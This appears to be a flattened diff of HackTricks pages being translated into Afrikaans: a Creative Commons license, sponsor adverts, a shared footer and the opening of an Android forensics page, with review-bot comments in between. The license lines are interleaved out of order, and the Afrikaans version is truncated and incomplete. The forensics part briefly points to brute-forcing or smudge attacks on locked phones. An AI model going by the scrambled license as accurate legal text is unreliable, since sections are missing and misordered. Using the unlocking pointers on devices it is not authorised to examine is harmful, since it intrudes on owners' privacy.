B. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material.
1. As U die Gelisensieerde Materiaal deel (insluitend in gewysigde vorm), moet U:
6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i).
b. ___Other rights.___
A. die volgende behou as dit deur die Lisensiehouer saam met die Gelisensieerde Materiaal voorsien word:
1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise.
i. identifikasie van die skepper(s) van die Gelisensieerde Materiaal en enige ander persone wat aangewys is om erkenning te ontvang, op enige redelike wyse wat deur die Lisensiehouer versoek word (insluitend deur skuilnaam as dit aangewys word);
2. Patent and trademark rights are not licensed under this Public License.
ii. 'n kopieregkennisgewing;
3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
## Section 3 – License Conditions.
iii. 'n kennisgewing wat na hierdie Openbare Lisensie verwys;
Your exercise of the Licensed Rights is expressly made subject to the following conditions.
iv. 'n kennisgewing wat na die vrywaring van waarborge verwys;
a. ___Attribution.___
v. 'n URI of skakel na die Gelisensieerde Materiaal, vir sover dit redelik uitvoerbaar is;
1. If You Share the Licensed Material (including in modified form), You must:
B. aandui of U die Gelisensieerde Materiaal gewysig het en 'n aanduiding van enige vorige wysigings behou; en
A. retain the following if it is supplied by the Licensor with the Licensed Material:
C. aandui dat die Gelisensieerde Materiaal gelisensieer is onder hierdie Openbare Lisensie, en die teks van, of die URI of skakel na, hierdie Openbare Lisensie insluit.
i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated);
2. U kan aan die voorwaardes in Artikel 3(a)(1) voldoen op enige redelike wyse gebaseer op die medium, middels, en konteks waarin U die Gelisensieerde Materiaal deel. Byvoorbeeld, dit mag redelik wees om aan die voorwaardes te voldoen deur 'n URI of skakel na 'n hulpbron te voorsien wat die vereiste inligting insluit.
ii. a copyright notice;
3. Indien versoek deur die Lisensiehouer, moet U enige van die inligting wat vereis word deur Artikel 3(a)(1)(A) verwyder, vir sover dit redelik uitvoerbaar is.
iii. a notice that refers to this Public License;
4. As U Aangepaste Materiaal wat U produseer deel, mag die Lisensie van die Aanpasser wat U toepas, nie ontvangers van die Aangepaste Materiaal verhoed om aan hierdie Openbare Lisensie te voldoen nie.
iv. a notice that refers to the disclaimer of warranties;
## Artikel 4 - Sui Generis Databasisregte.
v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;
Waar die Gelisensieerde Regte Sui Generis Databasisregte insluit wat van toepassing is op U gebruik van die Gelisensieerde Materiaal:
B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and
a. vir die vermyding van twyfel, verleen Artikel 2(a)(1) U die reg om al of 'n aansienlike gedeelte van die inhoud van die databasis te onttrek, hergebruik, verveelvoudig, en te deel vir nie-kommersiële doeleindes slegs;
C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License.
b. as U al of 'n aansienlike gedeelte van die inhoud van die databasis insluit in 'n databasis waarin U Sui Generis Databasisregte het, dan is die databasis waarin U Sui Generis Databasisregte het (maar nie sy individuele inhoud nie) Aangepaste Materiaal; en
2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information.
c. U moet voldoen aan die voorwaardes in Artikel 3(a) as U al of 'n aansienlike gedeelte van die inhoud van die databasis deel.
3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable.
Vir die vermyding van twyfel, vul
## Artikel 7 - Ander Voorwaardes en Bepalings.
4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License.
a. Die Lisensiehouer sal nie gebonde wees aan enige bykomende of verskillende terme of voorwaardes wat deur U gekommunikeer word tensy uitdruklik ooreengekom.
## Section 4 – Sui Generis Database Rights.
b. Enige reëlings, verstandhoudings of ooreenkomste met betrekking tot die Gelisensieerde Materiaal wat nie hierin vermeld word nie, is afsonderlik van en onafhanklik van die terme en voorwaardes van hierdie Openbare Lisensie.
Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
## Artikel 8 - Interpretasie.
a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only;
a. Ten einde twyfel te voorkom, verminder hierdie Openbare Lisensie nie, en mag nie geïnterpreteer word om, die gebruik van die Gelisensieerde Materiaal te beperk, beperk, beperk of voorwaardes op te lê wat wettiglik sonder toestemming onder hierdie Openbare Lisensie gemaak kan word nie.
b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material; and
b. Vir sover moontlik, as enige bepaling van hierdie Openbare Lisensie as onafdwingbaar beskou word, sal dit outomaties hervorm word tot die minimum mate wat nodig is om dit afdwingbaar te maak. As die bepaling nie hervorm kan word nie, sal dit van hierdie Openbare Lisensie afgesny word sonder om die afdwingbaarheid van die oorblywende terme en voorwaardes te beïnvloed.
c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database.
For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
## Section 5 – Disclaimer of Warranties and Limitation of Liability.
a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__
b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__
c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
## Section 6 – Term and Termination.
a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates:
1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or
2. upon express reinstatement by the Licensor.
For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License.
c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License.
d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
## Section 7 – Other Terms and Conditions.
a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
## Section 8 – Interpretation.
a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.
b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions.
c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor.
d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority.
c. Geen term of voorwaarde van hierdie Openbare Lisensie sal afgesien word nie en geen versuim om te voldoen sal toegestem word tensy uitdruklik ooreengekom deur die Lisensiehouer.
d. Niks in hierdie Openbare Lisensie stel 'n beperking op, of afstand van, enige voorregte en immuniteite wat van toepassing is op die Lisensiehouer of U nie, insluitend van die regsprosesse van enige jurisdiksie of gesag.
```
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
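Review bot: the translated side of the license drops Sections 5 and 6 and truncates the closing sentence of Section 4. On the Afrikaans side, "Vir die vermyding van twyfel, vul" stops mid-sentence and is followed directly by "## Artikel 7 - Ander Voorwaardes en Bepalings.", so the Afrikaans text has no counterpart to "Section 5 – Disclaimer of Warranties and Limitation of Liability" or "Section 6 – Term and Termination", both of which remain on the English side. Section 2(b)(3) is also mistranslated: "waives any right to collect royalties" becomes "afstand van enige reg om koninklike te erf", which does not mean collecting royalties. The closing Creative Commons notice itself refers to unauthorized modifications of its public licenses, so keep the complete English license text as the governing version and present the Afrikaans text only as a convenience translation, after restoring the missing sections.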
83
README.md
@ -2,39 +2,39 @@
<figure><img src=".gitbook/assets/hacktricks.gif" alt=""><figcaption></figcaption></figure>
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
_Hacktricks logo's & bewegingsontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
{% hint style="success" %}
**Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.**
**Welkom by die wiki waar jy elke haktruk/tegniek/wat ek geleer het van CTF's, werklike toepassings, navorsing en nuus sal vind.**
{% endhint %}
To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:**
Om te begin, volg hierdie bladsy waar jy die **tipiese vloei** sal vind wat **jy moet volg wanneer jy een of meer masjiene pentest:**
{% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %}
[pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md)
{% endcontent-ref %}
## Platinum Sponsors
## Platinum Borge
_Your company could be here._
_Jou maatskappy kan hier wees._
## Corporate Sponsors
## Korporatiewe Borge
### [STM Cyber](https://www.stmcyber.com)
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training.
[**STM Cyber**](https://www.stmcyber.com) is 'n uitstekende sibersekuriteitsmaatskappy met die leuse **HACK THE UNHACKABLE**. Hulle doen hul eie navorsing en ontwikkel hul eie hakwerkstukke om **verskeie waardevolle sibersekuriteitsdienste** soos pentesting, Rooi spanne en opleiding aan te bied.
You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
Jy kan hul **blog** besoek by [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
**STM Cyber** also support cybersecurity open source projects like HackTricks :)
**STM Cyber** ondersteun ook sibersekuriteit oopbronprojekte soos HackTricks :)
### [RootedCON](https://www.rootedcon.com/)
<figure><img src=".gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
[**RootedCON**](https://www.rootedcon.com) is die belangrikste sibersekuriteitsgeleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline.
{% embed url="https://www.rootedcon.com/" %}
@ -42,9 +42,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
**Intigriti** is die **#1** etiese hak- en **foutbeloningsplatform in Europa.**
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Foutbeloningswenk**: **teken aan** vir **Intigriti**, 'n premium **foutbeloningsplatform wat deur hakkers, vir hakkers** geskep is! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin belonings verdien tot **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -53,9 +53,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
<figure><img src=".gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome outomaties** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapswerkstukke.
Get Access Today:
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -63,13 +63,13 @@ Get Access Today:
<figure><img src=".gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Stay a step ahead in the cybersecurity game.
Bly 'n tree voor in die sibersekuriteitspel.
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, and prioritize issues that leave your systems most exposed so you can focus on what matters most.
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) maak foutbestuur maklik. Hou jou aanvalsoppervlak dop, sien waar jou maatskappy kwesbaar is, en prioritiseer kwessies wat jou stelsels die meeste blootstel sodat jy kan fokus op wat die belangrikste is.
Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs and cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) and streamline DevOps so your team can implement fixes faster.
Voer duisende kontroles uit met 'n enkele platform wat jou hele tegniese stapel van interne infrastruktuur tot webtoepassings, API's en wolkstelsels dek. Integreer naadloos met [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) en stroomlyn DevOps sodat jou span vinniger herstelwerk kan implementeer.
Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site and take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
Intruder rus nooit nie. Rondom-die-klok beskerming monitor jou stelsels 24/7. Wil jy meer weet? Besoek hul webwerf en probeer dit uit met [**'n gratis toetslopie**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
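Review bot: "vulnerability management" is rendered as "foutbestuur" (fault management) on the translated side of the Intruder paragraph, while the same sentence translates "vulnerable" as "kwesbaar"; use "kwesbaarheidsbestuur" so the term matches the rest of the paragraph and the cloud-vulnerability-scanning page it links to.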
@ -77,26 +77,26 @@ Intruder never rests. Round-the-clock protection monitors your systems 24/7. Wan
<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hakkers en foutbeloningsjagters te kommunikeer!
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
**Hakinsigte**\
Raak betrokke by inhoud wat die opwinding en uitdagings van hak insluit
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
**Realtydse Haknuus**\
Bly op hoogte van die vinnige hakwêreld deur realtydse nuus en insigte
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
**Nuutste Aankondigings**\
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hakkers!
***
### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit
### [Pentest-Tools.com](https://pentest-tools.com/) - Die noodsaaklike penetrasietoetsingstoolkit
<figure><img src=".gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognosering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporing- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, dop te maak en pret te hê.
{% embed url="https://pentest-tools.com/" %}
@ -104,19 +104,18 @@ Stay informed with the newest bug bounties launching and crucial platform update
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
[**WebSec**](https://websec.nl) is 'n professionele sibersekuriteitsmaatskappy wat in **Amsterdam** gebaseer is en help om besighede **regoor die wêreld** teen die nuutste sibersekuriteitsdreigings te beskerm deur **offensiewe-sibersekuriteitsdienste** met 'n **moderne** benadering te bied.
WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more.
WebSec is 'n **alles-in-een sibersekuriteitsmaatskappy**, wat beteken dat hulle alles doen; Pentesting, **Sekerheids** Ouditse, Bewustheidsopleiding, Phishing-kampanjes, Kode-oorsig, Uitbuitingsontwikkeling, Uitbesteding van Sekuriteitskundiges en nog baie meer.
Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) and [**blog**](https://websec.nl/blog/)!
'n Ander koel ding oor WebSec is dat hulle, in teenstelling met die bedryfsgemiddelde, **baie selfversekerd is in hul vaardighede**, tot so 'n mate dat hulle die beste kwaliteit resultate waarborg, dit staan op hul webwerf "**As ons dit nie kan hak nie, betaal jy nie daarvoor nie!**". Vir meer inligting kyk na hul [**webwerf**](https://websec.nl/en/) en [**blog**](https://websec.nl/blog/)!
In addition to the above WebSec is also a **committed supporter of HackTricks.**
Bo en behalwe die bogenoemde is WebSec ook 'n **toegewyde ondersteuner van HackTricks.**
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
## Lisensie & Vrywaring
## License & Disclaimer
**Check them in:**
**Kyk na hulle in:**
{% content-ref url="welcome/hacktricks-values-and-faq.md" %}
[hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md)
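Review bot: this hunk shrinks the region from 19 to 18 lines, and on the translated side the "## Lisensie & Vrywaring" heading appears immediately after the `{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}` line; check that the blank line separating the embed from the "## License & Disclaimer" heading was not dropped in translation, since the GitBook embed tag should stay on its own paragraph before the heading.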
@ -124,14 +123,14 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
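Review bot: the shared footer is rendered slightly differently here than in the other files touched by this commit: "hacktruuks" and "github-opslagplekke" in this hunk against "hacking-truuks" and "GitHub-opslagplekke" in the Android Forensics and Salseo files below. Since this block is boilerplate repeated in every page, paste one agreed version everywhere (suggest "hacking-truuks" and "GitHub-opslagplekke", which most of the commit already uses).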
@ -1,51 +1,51 @@
|
|||
# Android Forensics
|
||||
# Android Forensika
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
## Locked Device
|
||||
## Geslote Toestel
|
||||
|
||||
To start extracting data from an Android device it has to be unlocked. If it's locked you can:
|
||||
Om data uit 'n Android-toestel te onttrek, moet dit oopgemaak word. As dit gesluit is, kan jy:
|
||||
|
||||
* Check if the device has debugging via USB activated.
|
||||
* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
|
||||
* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
|
||||
* Kyk of die toestel USB-afdeling aktief het.
|
||||
* Kyk vir 'n moontlike [smudge-aanval](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
|
||||
* Probeer met [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
|
||||
|
||||
## Data Adquisition
|
||||
## Data Verkryging
|
||||
|
||||
Create an [android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
|
||||
Skep 'n [Android-back-up met adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) en onttrek dit met behulp van [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
|
||||
|
||||
### If root access or physical connection to JTAG interface
|
||||
### As daar worteltoegang of fisiese verbinding met JTAG-interface is
|
||||
|
||||
